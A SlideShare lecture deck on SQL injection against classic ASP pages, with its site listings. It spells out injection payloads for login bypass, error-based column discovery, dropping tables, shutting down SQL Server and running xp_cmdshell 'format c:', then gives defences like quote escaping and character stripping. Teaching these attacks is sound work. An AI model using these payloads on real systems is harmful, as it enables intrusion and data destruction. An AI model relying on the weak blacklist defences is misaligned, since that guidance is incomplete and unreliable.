SlideShare a Scribd company logo

Sql Injection Attacks Siddhesh

Download as PPT, PDF
Siddhesh Bhobe, profile picture
Siddhesh Bhobe

SQL injection attacks occur when malicious code is inserted into an SQL query, allowing attackers to read or modify data in a database. They work by exploiting insecure code that fails to properly sanitize user input. To prevent SQL injection, developers should escape quotes, remove dangerous characters from queries, limit user privileges and access, and validate all user-provided data.

Technology
1 of 26
Downloaded 341 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
SQL Injection Attacks Siddhesh Bhobe
SQL Injection Attack… … "injects" or manipulates SQL code using “string-building” techniques. By adding unexpected SQL to a query, it is possible to manipulate a database in many unanticipated ways. Attacks are successful due to poor input validation at code layer
Example 1: HTML Form Consider the following HTML form for Login: <form name=&quot;frmLogin&quot; action=&quot;login.asp&quot; method=&quot;post&quot;> Username: <input type=&quot;text&quot; name=&quot;userName&quot;> Password: <input type=&quot;text&quot; name=&quot;password&quot;> <input type=&quot;submit&quot;> </form>
Example 1: ASP Script <% … userName = Request.Form(&quot;userName“ password = Request.Form(&quot;password&quot;) query = &quot;select count(*) from users where userName='&quot; & userName & &quot;' and userPass='&quot; & password & &quot;'“ … %>
Sample Input Login =john, Password = doe select count(*) from users where userName='john' and userPass='doe'
Now check this! Login = john, Password = ' or 1=1 -- select count(*) from users where userName='john' and userPass='' or 1=1 --' Password check is nullified -- used to prevent ASP from reporting mismatched quotes
And what about this? Username: ' or 1=1 -- and Password: [Empty] select count(*) from users where userName='' or 1=1 --' and userPass=''
Example 2 Username: ' having 1=1 -- , Password: [Empty] select userName from users where userName='' having 1=1
You get a column name… You will get the following error message: Microsoft OLE DB Provider for SQL Server (0x80040E14) Column ' users.userName ' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /login.asp, line 16
The Attack… Username: ' or users.userName like 'a%' -- select userName from users where userName='' or users.userName like 'a%' --' and userPass='' Logged In As admin!!!
Use of Semi-colon Semi-colon allows multiple queries to be specified on one line. Submitted as one batch and executed sequentially select 1; select 1+2; select 1+3;
Can you guess what happens? Username: ' or 1=1; drop table users; --
Table dropped! Username: ' or 1=1; drop table users; -- and Password: [Anything] Firstly, it would select the userName field for all rows in the users table. Secondly, it would delete the users table
SHUTDOWN WITH NOWAIT!! … causes SQL Server to shutdown, immediately stopping the Windows service Username: '; shutdown with nowait; -- select userName from users where userName=''; shutdown with nowait; --' and userPass=''
Products.asp http://localhost/products.asp?productId=1 returns Got product Pink Hoola Hoop But what about this? http://localhost/products.asp?productId=0;insert%20into%20products (prodName)%20values(left(@@version,50))
Wham! Here's the query without the URL-encoded spaces: http://localhost/products.asp?productId=0;insert into products(prodName) values(left(@@version,50)) Runs an INSERT query on the products table, adding the first 50 characters of SQL server's @@version variable as a new record in the products table.
Effects Privilege Level: sa Total control of SQL Server OS Shell at privilege of MSSQLServer service using xp_cmdshell Ability to read, write, mutilate all data
Effects Privilege Level: db_owner Read/write all data in affected database Drop tables Create new objects Take control of the database
Effects Privilege Level: normal user (no fixed server or database roles) Access objects to which permission is given At best, only some few stored procedures At worst, read/write access to all tables Recommended!
Testing for Vulnerability Disable error handling so that errors are displayed Input single quotes to see if the application fails Failure indicates poor validation and corruption of SQL
Preventing SQL Injection Attacks Limit User Access Escape Quotes Remove culprit characters Limit length of user input
Limit User Access Do not use “sa” account Removed extended SPs if you are not using them. The following are couple of the most damaging ones: xp_cmdshell xp_grantlogin Use SPs to abstract data access
Escape Quotes Convert single quotes to double quotes <% function stripQuotes(strWords) stripQuotes = replace(strWords, &quot;'&quot;, &quot;''&quot;) end function %> Converts select count(*) from users where userName='john' and userPass='' or 1=1 --' ...to this: select count(*) from users where userName='john'' and userPass=''' or 1=1 --'
Drop culprit characters Drop character sequences like ; , -- , insert and xp_ select prodName from products where id=1; xp_cmdshell 'format c: /q /yes '; drop database myDB; -- becomes select prodName from products where id=1 cmdshell ''format c: /q /yes '' database myDB
Restrict length of user input Limit length in the form field Use validating functions for numeric input Use POST, not GET
Thanks! Original Article: http://www. webmasterbase .com/article. php ?aid=794& pid =0 Also on Reismagos…

More Related Content

PPT
SQL Injection
Adhoura Academy
 
PPT
D:\Technical\Ppt\Sql Injection
avishkarm
 
PPTX
Sql injection
Hemendra Kumar
 
PPT
Sql injection
Nikunj Dhameliya
 
PPT
Sql injection attack
RajKumar Rampelli
 
PPTX
Ppt on sql injection
ashish20012
 
PPT
Web application attacks using Sql injection and countermasures
Cade Zvavanjanja
 
PPT
A Brief Introduction in SQL Injection
Sina Manavi
 
SQL Injection
Adhoura Academy
 
D:\Technical\Ppt\Sql Injection
avishkarm
 
Sql injection
Hemendra Kumar
 
Sql injection
Nikunj Dhameliya
 
Sql injection attack
RajKumar Rampelli
 
Ppt on sql injection
ashish20012
 
Web application attacks using Sql injection and countermasures
Cade Zvavanjanja
 
A Brief Introduction in SQL Injection
Sina Manavi
 

What's hot (20)

PPT
Advanced Sql Injection ENG
Dmitry Evteev
 
PDF
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
PPTX
SQL Injection Defense in Python
Public Broadcasting Service
 
PPTX
SQL Injection in action with PHP and MySQL
Pradeep Kumar
 
PPT
Advanced SQL Injection
amiable_indian
 
PDF
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
 
PPT
Sql injection
Nitish Kumar
 
PPTX
Sql injection - security testing
Napendra Singh
 
PDF
What is advanced SQL Injection? Infographic
JW CyberNerd
 
PDF
Sql Injection and XSS
Mike Crabb
 
PPTX
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
PDF
SQL Injection Tutorial
Magno Logan
 
PPTX
SQL INJECTION
Mentorcs
 
PPTX
Sql Injection attacks and prevention
helloanand
 
PPTX
SQL Injections (Part 1)
n|u - The Open Security Community
 
PPTX
seminar report on Sql injection
Jawhar Ali
 
PDF
Asp
Adil Jafri
 
PPT
Sql Injection Tutorial!
ralphmigcute
 
PPT
Sql injection attacks
Kumar
 
PPTX
SQL Injection Attacks cs586
Stacy Watts
 
Advanced Sql Injection ENG
Dmitry Evteev
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
SQL Injection Defense in Python
Public Broadcasting Service
 
SQL Injection in action with PHP and MySQL
Pradeep Kumar
 
Advanced SQL Injection
amiable_indian
 
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
 
Sql injection
Nitish Kumar
 
Sql injection - security testing
Napendra Singh
 
What is advanced SQL Injection? Infographic
JW CyberNerd
 
Sql Injection and XSS
Mike Crabb
 
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
SQL Injection Tutorial
Magno Logan
 
SQL INJECTION
Mentorcs
 
Sql Injection attacks and prevention
helloanand
 
SQL Injections (Part 1)
n|u - The Open Security Community
 
seminar report on Sql injection
Jawhar Ali
 
Asp
Adil Jafri
 
Sql Injection Tutorial!
ralphmigcute
 
Sql injection attacks
Kumar
 
SQL Injection Attacks cs586
Stacy Watts
 
Ad

Viewers also liked (18)

PPT
Sql injection
Pallavi Biswas
 
PPTX
SQL INJECTION
Anoop T
 
PPTX
Sql Injection and Entity Frameworks
Rich Helton
 
PDF
Advanced SQL Injection: Attacks
Nuno Loureiro
 
PPTX
Understanding and preventing sql injection attacks
Kevin Kline
 
PPTX
SQL Injection
Marios Siganos
 
PPTX
Sql injection
Zidh
 
PPTX
SQL injection and SYN attack
Tesfahunegn Minwuyelet
 
PPT
SQL Injection in PHP
Dave Ross
 
PPTX
03. sql and other injection module v17
Eoin Keary
 
PPTX
Threat modeling librarian freedom conference
evacide
 
PDF
Neutralizing SQL Injection in PostgreSQL
Juliano Atanazio
 
PDF
SQL Injection - The Unknown Story
Imperva
 
PPTX
SQL injection
Akash Panchal
 
PPT
Introduction to SQL Injection
jpubal
 
PPTX
Sql injection
Sasha-Leigh Garret
 
PDF
Defcon 17-joseph mccray-adv-sql_injection
Ahmed AbdelSatar
 
PPTX
Website attack n defacement n its control measures
أحلام انصارى
 
Sql injection
Pallavi Biswas
 
SQL INJECTION
Anoop T
 
Sql Injection and Entity Frameworks
Rich Helton
 
Advanced SQL Injection: Attacks
Nuno Loureiro
 
Understanding and preventing sql injection attacks
Kevin Kline
 
SQL Injection
Marios Siganos
 
Sql injection
Zidh
 
SQL injection and SYN attack
Tesfahunegn Minwuyelet
 
SQL Injection in PHP
Dave Ross
 
03. sql and other injection module v17
Eoin Keary
 
Threat modeling librarian freedom conference
evacide
 
Neutralizing SQL Injection in PostgreSQL
Juliano Atanazio
 
SQL Injection - The Unknown Story
Imperva
 
SQL injection
Akash Panchal
 
Introduction to SQL Injection
jpubal
 
Sql injection
Sasha-Leigh Garret
 
Defcon 17-joseph mccray-adv-sql_injection
Ahmed AbdelSatar
 
Website attack n defacement n its control measures
أحلام انصارى
 
Ad

Similar to Sql Injection Attacks Siddhesh (20)

PPT
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
PPT
Security.ppt
webhostingguy
 
PPT
Joomla security nuggets
guestbd1cdca
 
PPT
SQL Injection Attacks
Compare Infobase Limited
 
PPTX
How did i steal your database
Mostafa Siraj
 
PPSX
Web Security
Supankar Banik
 
PPTX
Playing With (B)Sqli
Chema Alonso
 
ODP
Concern of Web Application Security
Mahmud Ahsan
 
PPT
secure php
Riyad Bin Zaman
 
PPT
General Principles of Web Security
jemond
 
PPT
Sql Injection Attacks And Defense Presentatio (1)
guest32e5cfe
 
PPT
Boston Computing Review - Ruby on Rails
John Brunswick
 
PPT
Sql Injection
Sanjeev Kumar Jaiswal
 
PPT
Sql Injection Adv Owasp
Aung Khant
 
PPT
Open Source Package Php Mysql 1228203701094763 9
isadorta
 
PPT
Open Source Package PHP & MySQL
kalaisai
 
PDF
PHP Secure Programming
Balavignesh Kasinathan
 
ODP
Top 10 Web Security Vulnerabilities
Carol McDonald
 
ODP
2009 Barcamp Nashville Web Security 101
brian_dailey
 
PPT
Web Security Mistakes: Trusting The Client
grutz
 
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
Security.ppt
webhostingguy
 
Joomla security nuggets
guestbd1cdca
 
SQL Injection Attacks
Compare Infobase Limited
 
How did i steal your database
Mostafa Siraj
 
Web Security
Supankar Banik
 
Playing With (B)Sqli
Chema Alonso
 
Concern of Web Application Security
Mahmud Ahsan
 
secure php
Riyad Bin Zaman
 
General Principles of Web Security
jemond
 
Sql Injection Attacks And Defense Presentatio (1)
guest32e5cfe
 
Boston Computing Review - Ruby on Rails
John Brunswick
 
Sql Injection
Sanjeev Kumar Jaiswal
 
Sql Injection Adv Owasp
Aung Khant
 
Open Source Package Php Mysql 1228203701094763 9
isadorta
 
Open Source Package PHP & MySQL
kalaisai
 
PHP Secure Programming
Balavignesh Kasinathan
 
Top 10 Web Security Vulnerabilities
Carol McDonald
 
2009 Barcamp Nashville Web Security 101
brian_dailey
 
Web Security Mistakes: Trusting The Client
grutz
 

More from Siddhesh Bhobe (16)

PPTX
eMee at HR Tech Europe, 26 March, London
Siddhesh Bhobe
 
PPTX
Industry expectations from new recruits
Siddhesh Bhobe
 
PDF
The eMee Value Proposition
Siddhesh Bhobe
 
PPTX
Redefining Employee Engagement
Siddhesh Bhobe
 
PDF
Introduction to eMee
Siddhesh Bhobe
 
PDF
Tour Of Europe
Siddhesh Bhobe
 
PPT
Software As Solutions
Siddhesh Bhobe
 
PPT
Effective ALM
Siddhesh Bhobe
 
PPT
Bit Vectors Siddhesh
Siddhesh Bhobe
 
PPT
Anti Patterns Siddhesh Lecture1 Of3
Siddhesh Bhobe
 
PPT
Introduction To Dot Net Siddhesh
Siddhesh Bhobe
 
PPT
Ruby On Rails Siddhesh
Siddhesh Bhobe
 
PPT
Six Thinking Hats Siddhesh
Siddhesh Bhobe
 
PPT
Anti Patterns Siddhesh Lecture2 Of3
Siddhesh Bhobe
 
PPT
Software Accessibility Siddhesh
Siddhesh Bhobe
 
PPT
Anti Patterns Siddhesh Lecture3 Of3
Siddhesh Bhobe
 
eMee at HR Tech Europe, 26 March, London
Siddhesh Bhobe
 
Industry expectations from new recruits
Siddhesh Bhobe
 
The eMee Value Proposition
Siddhesh Bhobe
 
Redefining Employee Engagement
Siddhesh Bhobe
 
Introduction to eMee
Siddhesh Bhobe
 
Tour Of Europe
Siddhesh Bhobe
 
Software As Solutions
Siddhesh Bhobe
 
Effective ALM
Siddhesh Bhobe
 
Bit Vectors Siddhesh
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture1 Of3
Siddhesh Bhobe
 
Introduction To Dot Net Siddhesh
Siddhesh Bhobe
 
Ruby On Rails Siddhesh
Siddhesh Bhobe
 
Six Thinking Hats Siddhesh
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture2 Of3
Siddhesh Bhobe
 
Software Accessibility Siddhesh
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture3 Of3
Siddhesh Bhobe
 

Recently uploaded (20)

PDF
madgavkar20181017ppt McKinsey Presentation.pdf
georgschmitzdoerner
 
PPTX
C Programming Basics concept krnppt.pptx
Karan Prajapat
 
PPTX
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
AVTRON Technologies LLC
 
PDF
Automating ArcGIS Content Discovery with FME: A Real World Use Case
Safe Software
 
PDF
DevOps & Developer Experience Summer BBQ
AUGNYC
 
PDF
Enable Enterprise-Ready Security on IBM i Systems.pdf
Precisely
 
PPTX
ChatGPT's Deck on The Enduring Legacy of Fax Machines
Greg Swan
 
PDF
NewMind AI Weekly Chronicles - July'25 - Week IV
NewMind AI
 
PDF
How Onsite IT Support Drives Business Efficiency, Security, and Growth.pdf
Captain IT
 
PDF
solutions_manual_-_materials___processing_in_manufacturing__demargo_.pdf
AbdullahSani29
 
PDF
Orbitly Pitch Deck|A Mission-Driven Platform for Side Project Collaboration (...
zz41354899
 
PDF
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
PDF
Chapter 2 Digital Image Fundamentals.pdf
Getnet Tigabie Askale -(GM)
 
PPTX
The Power of IoT Sensor Integration in Smart Infrastructure and Automation.pptx
Rejig Digital
 
PDF
REPORT: Heating appliances market in Poland 2024
SPIUG
 
PDF
Revolutionize Operations with Intelligent IoT Monitoring and Control
Rejig Digital
 
PDF
Make GenAI investments go further with the Dell AI Factory - Infographic
Principled Technologies
 
PDF
How-Cloud-Computing-Impacts-Businesses-in-2025-and-Beyond.pdf
Artjoker Software Development Company
 
PPTX
Smart Infrastructure and Automation through IoT Sensors
Rejig Digital
 
PDF
Why Your AI & Cybersecurity Hiring Still Misses the Mark in 2025
Virtual Employee Pvt. Ltd.
 
madgavkar20181017ppt McKinsey Presentation.pdf
georgschmitzdoerner
 
C Programming Basics concept krnppt.pptx
Karan Prajapat
 
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
AVTRON Technologies LLC
 
Automating ArcGIS Content Discovery with FME: A Real World Use Case
Safe Software
 
DevOps & Developer Experience Summer BBQ
AUGNYC
 
Enable Enterprise-Ready Security on IBM i Systems.pdf
Precisely
 
ChatGPT's Deck on The Enduring Legacy of Fax Machines
Greg Swan
 
NewMind AI Weekly Chronicles - July'25 - Week IV
NewMind AI
 
How Onsite IT Support Drives Business Efficiency, Security, and Growth.pdf
Captain IT
 
solutions_manual_-_materials___processing_in_manufacturing__demargo_.pdf
AbdullahSani29
 
Orbitly Pitch Deck|A Mission-Driven Platform for Side Project Collaboration (...
zz41354899
 
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
Chapter 2 Digital Image Fundamentals.pdf
Getnet Tigabie Askale -(GM)
 
The Power of IoT Sensor Integration in Smart Infrastructure and Automation.pptx
Rejig Digital
 
REPORT: Heating appliances market in Poland 2024
SPIUG
 
Revolutionize Operations with Intelligent IoT Monitoring and Control
Rejig Digital
 
Make GenAI investments go further with the Dell AI Factory - Infographic
Principled Technologies
 
How-Cloud-Computing-Impacts-Businesses-in-2025-and-Beyond.pdf
Artjoker Software Development Company
 
Smart Infrastructure and Automation through IoT Sensors
Rejig Digital
 
Why Your AI & Cybersecurity Hiring Still Misses the Mark in 2025
Virtual Employee Pvt. Ltd.
 

Sql Injection Attacks Siddhesh

  • 1. SQL Injection Attacks Siddhesh Bhobe
  • 2. SQL Injection Attack… … &quot;injects&quot; or manipulates SQL code using “string-building” techniques. By adding unexpected SQL to a query, it is possible to manipulate a database in many unanticipated ways. Attacks are successful due to poor input validation at code layer
  • 3. Example 1: HTML Form Consider the following HTML form for Login: <form name=&quot;frmLogin&quot; action=&quot;login.asp&quot; method=&quot;post&quot;> Username: <input type=&quot;text&quot; name=&quot;userName&quot;> Password: <input type=&quot;text&quot; name=&quot;password&quot;> <input type=&quot;submit&quot;> </form>
  • 4. Example 1: ASP Script <% … userName = Request.Form(&quot;userName“ password = Request.Form(&quot;password&quot;) query = &quot;select count(*) from users where userName='&quot; & userName & &quot;' and userPass='&quot; & password & &quot;'“ … %>
  • 5. Sample Input Login =john, Password = doe select count(*) from users where userName='john' and userPass='doe'
  • 6. Now check this! Login = john, Password = ' or 1=1 -- select count(*) from users where userName='john' and userPass='' or 1=1 --' Password check is nullified -- used to prevent ASP from reporting mismatched quotes
  • 7. And what about this? Username: ' or 1=1 -- and Password: [Empty] select count(*) from users where userName='' or 1=1 --' and userPass=''
  • 8. Example 2 Username: ' having 1=1 -- , Password: [Empty] select userName from users where userName='' having 1=1
  • 9. You get a column name… You will get the following error message: Microsoft OLE DB Provider for SQL Server (0x80040E14) Column ' users.userName ' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /login.asp, line 16
  • 10. The Attack… Username: ' or users.userName like 'a%' -- select userName from users where userName='' or users.userName like 'a%' --' and userPass='' Logged In As admin!!!
  • 11. Use of Semi-colon Semi-colon allows multiple queries to be specified on one line. Submitted as one batch and executed sequentially select 1; select 1+2; select 1+3;
  • 12. Can you guess what happens? Username: ' or 1=1; drop table users; --
  • 13. Table dropped! Username: ' or 1=1; drop table users; -- and Password: [Anything] Firstly, it would select the userName field for all rows in the users table. Secondly, it would delete the users table
  • 14. SHUTDOWN WITH NOWAIT!! … causes SQL Server to shutdown, immediately stopping the Windows service Username: '; shutdown with nowait; -- select userName from users where userName=''; shutdown with nowait; --' and userPass=''
  • 15. Products.asp http://localhost/products.asp?productId=1 returns Got product Pink Hoola Hoop But what about this? http://localhost/products.asp?productId=0;insert%20into%20products (prodName)%20values(left(@@version,50))
  • 16. Wham! Here's the query without the URL-encoded spaces: http://localhost/products.asp?productId=0;insert into products(prodName) values(left(@@version,50)) Runs an INSERT query on the products table, adding the first 50 characters of SQL server's @@version variable as a new record in the products table.
  • 17. Effects Privilege Level: sa Total control of SQL Server OS Shell at privilege of MSSQLServer service using xp_cmdshell Ability to read, write, mutilate all data
  • 18. Effects Privilege Level: db_owner Read/write all data in affected database Drop tables Create new objects Take control of the database
  • 19. Effects Privilege Level: normal user (no fixed server or database roles) Access objects to which permission is given At best, only some few stored procedures At worst, read/write access to all tables Recommended!
  • 20. Testing for Vulnerability Disable error handling so that errors are displayed Input single quotes to see if the application fails Failure indicates poor validation and corruption of SQL
  • 21. Preventing SQL Injection Attacks Limit User Access Escape Quotes Remove culprit characters Limit length of user input
  • 22. Limit User Access Do not use “sa” account Removed extended SPs if you are not using them. The following are couple of the most damaging ones: xp_cmdshell xp_grantlogin Use SPs to abstract data access
  • 23. Escape Quotes Convert single quotes to double quotes <% function stripQuotes(strWords) stripQuotes = replace(strWords, &quot;'&quot;, &quot;''&quot;) end function %> Converts select count(*) from users where userName='john' and userPass='' or 1=1 --' ...to this: select count(*) from users where userName='john'' and userPass=''' or 1=1 --'
  • 24. Drop culprit characters Drop character sequences like ; , -- , insert and xp_ select prodName from products where id=1; xp_cmdshell 'format c: /q /yes '; drop database myDB; -- becomes select prodName from products where id=1 cmdshell ''format c: /q /yes '' database myDB
  • 25. Restrict length of user input Limit length in the form field Use validating functions for numeric input Use POST, not GET
  • 26. Thanks! Original Article: http://www. webmasterbase .com/article. php ?aid=794& pid =0 Also on Reismagos…